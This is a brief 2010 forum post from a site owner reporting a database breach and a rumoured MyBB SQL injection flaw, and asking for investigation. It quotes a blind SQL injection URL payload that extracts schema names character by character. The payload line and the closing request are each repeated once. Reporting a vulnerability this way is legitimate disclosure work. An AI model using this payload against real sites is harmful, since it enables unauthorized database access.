2010-10-31, 07:11 PM
The mysql database has been hacked on my site the last few days, although because of a protected admin panel they havent got CP access, although my password keeps getting changed, also somebody posted on my forum saying there was a mybb sql injection vuln about and he said it went something like this...
showthread.php?tid=1550/**/and/**/ascii(substring((select/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/[row],1),[+],1))=[char]--
If this could be investigated further that would be great
showthread.php?tid=1550/**/and/**/ascii(substring((select/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/[row],1),[+],1))=[char]--
If this could be investigated further that would be great